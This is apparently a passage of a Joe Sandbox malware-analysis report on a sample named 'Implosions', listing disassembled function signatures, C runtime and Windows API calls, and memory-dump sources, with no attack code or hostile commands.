              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
              • String ID: 'B
              • API String ID: 2805327698-2787509829
              APIs
              • __getptd.LIBCMT ref: 00414744
                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
              • __getptd.LIBCMT ref: 0041475B
              • __amsg_exit.LIBCMT ref: 00414769
              • __lock.LIBCMT ref: 00414779
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
              • String ID: @.B
              • API String ID: 3521780317-470711618
              APIs
              • __getptd.LIBCMT ref: 00413FD8
                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
              • __amsg_exit.LIBCMT ref: 00413FF8
              • __lock.LIBCMT ref: 00414008
              • InterlockedDecrement.KERNEL32(?), ref: 00414025
              • InterlockedIncrement.KERNEL32(02231660), ref: 00414050
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
              • String ID:
              • API String ID: 4271482742-0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __calloc_crt
              • String ID: P$B$`$B
              • API String ID: 3494438863-235554963
              APIs
              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: IsProcessorFeaturePresent$KERNEL32
              • API String ID: 1646373207-3105848591
              APIs
              • ___addlocaleref.LIBCMT ref: 0041470C
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
              • ___removelocaleref.LIBCMT ref: 00414717
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
              • ___freetlocinfo.LIBCMT ref: 0041472B
                • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
              • String ID: @.B
              • API String ID: 467427115-470711618
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (_^q$(_^q$Hbq$Hbq$Hbq
              • API String ID: 0-2986095749
              APIs
              • __fileno.LIBCMT ref: 0040C77C
              • __locking.LIBCMT ref: 0040C791
                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __decode_pointer__fileno__getptd_noexit__locking
              • String ID:
              • API String ID: 2395185920-0
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: _fseek_malloc_memset
              • String ID:
              • API String ID: 208892515-0
              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
              • __isleadbyte_l.LIBCMT ref: 00415307
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0